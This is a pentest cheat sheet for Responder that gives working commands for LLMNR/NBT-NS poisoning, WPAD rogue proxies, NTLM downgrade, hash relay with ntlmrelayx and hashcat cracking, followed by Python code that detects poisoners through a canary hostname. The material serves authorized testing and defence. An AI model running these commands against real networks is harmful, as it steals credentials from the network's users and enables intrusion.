Responder Cheat Sheet
LLMNR/NBT-NS/mDNS poisoner and rogue authentication server for capturing NetNTLM hashes on authorized Windows networks.
Overview
Responder answers broadcast name resolution queries and hosts rogue SMB/HTTP servers to capture NetNTLMv2 hashes for offline cracking or relay—core tool for authorized Active Directory internal assessments.
Critical: Running Responder on production networks without explicit written approval can disrupt authentication and violate law and policy. Use only in lab or client-authorized penetration tests. Disable SMB and HTTP servers when using with ntlmrelayx to avoid poisoning your own relay.
Install
sudo apt install -y responder
or
git clone https://github.com/lgandx/Responder.git
Essential commands
Analyze mode (no poisoning) — safe first step on a new VLAN
sudo responder -I eth0 -A
Full poisoners + rogue servers
sudo responder -I eth0 -wd
Common workflows
Capture hashes for cracking —
sudo responder -I eth0 -wf
Hashes: /usr/share/responder/logs/ or Responder/logs/
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
Relay with ntlmrelayx —
Responder.conf: SMB = Off, HTTP = Off
sudo responder -I eth0 -v
sudo ntlmrelayx.py -tf targets.txt -smb2support
WPAD rogue proxy —
sudo responder -I eth0 -wF
Specific analyze-only protocols —
sudo responder -I eth0 -A -v
DHCP / ICMP options (advanced) —
sudo responder -I eth0 -P -v
Flags reference
| Flag | Description |
|---|---|
| -I IF | Interface |
| -A | Analyze mode (no poison) |
| -w | Start WPAD rogue proxy |
| -f | Fingerprint OS from NTLM |
| -F | Force WPAD auth |
| -v | Verbose |
| -d | Enable DHCP poison |
| -P | Force NTLM auth (HTTP/SMB) |
| -r | Attempt to downgrade to NetNTLMv1 |
| -b | Return basic HTTP auth vs NTLM |
Tips
- Always start with -A to observe broadcast volume before active poisoning.
- Turn off Responder servers when relaying to avoid capturing your own machine.
- Multicast name resolution should be disabled in hardened environments—document if no hashes appear.
- Pair captures with hashcat -m 5600 or relay to hosts without SMB signing.
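The flip side of the last two tips is detection: a blue team can spot an LLMNR poisoner on a segment by broadcasting queries for a canary hostname that no real host owns and alerting on any answer. The decoder below is an added example (not part of this cheat sheet or of the Responder project); the canary name, the function names and the sample datagram are constructed for illustration, and in practice the payload would come from UDP traffic captured on port 5355.

```python
import struct
import ipaddress

CANARY = "wpad-canary-7f3a"   # hypothetical canary hostname: no legitimate host resolves it

def _read_name(buf, off):
    """Decode a DNS-style name (labels, or a 0xC0 compression pointer) at buf[off:]."""
    labels, end, jumped = [], off, False
    while True:
        length = buf[off]
        if length & 0xC0 == 0xC0:           # pointer to an earlier copy of the name
            end = end if jumped else off + 2
            off, jumped = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF, True
            continue
        off += 1
        if length == 0:
            return ".".join(labels).lower(), (end if jumped else off)
        labels.append(buf[off:off + length].decode("ascii", "replace"))
        off += length

def parse_llmnr_response(payload):
    """Return [(name, rtype, rdata)] for the answer section of an LLMNR datagram (UDP 5355)."""
    _tid, flags, qd, an, _ns, _ar = struct.unpack("!6H", payload[:12])
    if not flags & 0x8000:                  # QR bit clear: a query, nothing to inspect
        return []
    off, answers = 12, []
    for _ in range(qd):                     # skip the echoed question section
        _, off = _read_name(payload, off)
        off += 4                            # QTYPE + QCLASS
    for _ in range(an):
        name, off = _read_name(payload, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", payload[off:off + 10])
        rdata = payload[off + 10:off + 10 + rdlen]
        off += 10 + rdlen
        if rtype == 1 and rdlen == 4:       # A record: render the IPv4 address
            rdata = str(ipaddress.IPv4Address(rdata))
        answers.append((name, rtype, rdata))
    return answers

def poisoner_alerts(payload, src_ip):
    """One alert per A answer for the canary name; the source IP is the suspected poisoner."""
    return [f"LLMNR poisoning suspected: {src_ip} answered {n!r} with {r}"
            for n, t, r in parse_llmnr_response(payload) if n == CANARY and t == 1]

def build_sample_response(name, ip, tid=0x1234):
    # Constructed datagram shaped like a poisoner's reply (ID echoed, QR=1, one A answer).
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    header = struct.pack("!6H", tid, 0x8000, 1, 1, 0, 0)
    answer = qname + struct.pack("!HHIH", 1, 1, 30, 4) + ipaddress.IPv4Address(ip).packed
    return header + qname + struct.pack("!HH", 1, 1) + answer
```

Feed real datagrams to poisoner_alerts together with their source address; an answer for the canary from any host is a high-confidence indicator, and an answer for a real hostname from an unexpected address is worth a second look.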